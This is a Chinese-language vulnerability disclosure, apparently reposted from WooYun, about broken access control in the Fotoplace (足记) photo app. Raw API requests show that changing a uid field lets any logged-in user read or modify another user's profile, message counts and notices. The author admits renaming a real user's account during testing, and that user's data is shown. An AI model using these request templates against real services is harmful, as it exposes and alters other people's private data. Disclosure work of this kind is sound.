频道栏目
首页 > 安全 > 系统安全 > 正文
足记APP 多处越权
2015-11-04 10:21:00      个评论    来源:WooYun  
收藏   我要投稿

老套路 启动应用 抓包,发现多处平行权限,这里看几个比较重要的

平行权限就是:我是用户A,我却能操作用户B的信息,在本例中B是任意用户,也就是我能操作任意用户的信息,包括察看修改。

0x0 篡改任意用户信息 (我都能篡改任意用户的信息了,这还不算"有效的危害证明"吗?)

在手机中修改自己的信息然后抓包,修改其中的UID字段就能随便修改目标用户的信息

随便找一个目标用户ID:19210912(这个不是我的帐号,是从推荐用户里选的一个)修改效果如图,因为修改之前没有截图,这个用户本来的头像是一个女生,名字也被我篡改了。

Screenshot.png

(一不小心把妹子名字改成了,当时只是测试,没想到这个漏洞真存在,不然肯定不会改人家名字"let_high")

{"data":{"albumCount":"0","allowFound":"1","avatar":"https://dn.fotoplace.cc/81622e8a4c414ffc998073f3c16158bb.jpg","city":"0","createAt":"1429614690000","description":"随便写点什么吧","followerCount":"4606","followingCount":"6","gender":"","isFollowing":"1","likeCount":"29","location":"","newCommentCount":"1","newLikeCount":"49","newMessageCount":"0","newMsgCount":"0","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56","postCount":"102","stopbyCount":"0","tagCount":"0","uid":"19210912","userName":"let_high","userSkin":"https://dn.fotoplace.cc/fp3811265.jpg-mb?t=314098","wishCount":"0"},"error":"","status":"0"}


0x1 查询任意用户消息数目(我都能察看任意用户的消息数目了,这还不算"有效的可利用的敏感信息泄露"吗?)

数据包内容如下 

POST /api2/user/user_message_count.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 95 uid=<目标用户ID>&token=<任意合法用户token>&version=2.9


仍然以刚才的妹子为例子 

{"data":{"newCommentCount":"1","newLikeCount":"49","newNoticeCount":"0","newNotifyCount":"6","newTotalCount":"56"},"error":"","status":"0"}

可以看到这个妹子的系统消息或者是个人消息的数目.


0x2 查询任意用户消息内容(我都能察看任意用户的消息内容了,这还不算"有效的可利用的敏感信息泄露"吗?)

数据包如下:


POST /api2/user/user_get_notice_list.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Host: www.fotoplace.cc Connection: Keep-Alive Accept-Encoding: gzip Content-Length: 107 version=2.9&uid=<目标用户ID>&token=<任意合法用户token>&pageindex=0


这里就是能看到上一步中的妹子的那些消息的具体内容,因为这里可能涉及到隐私,所有不方便展示效果.

解决方案:

完善权限管理

点击复制链接 与好友分享!回本站首页
相关TAG标签
上一篇:FltSetSecurityObject函数引起的Win2003Sp2死锁分析
下一篇:百度系应用WormHole漏洞细节分析
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站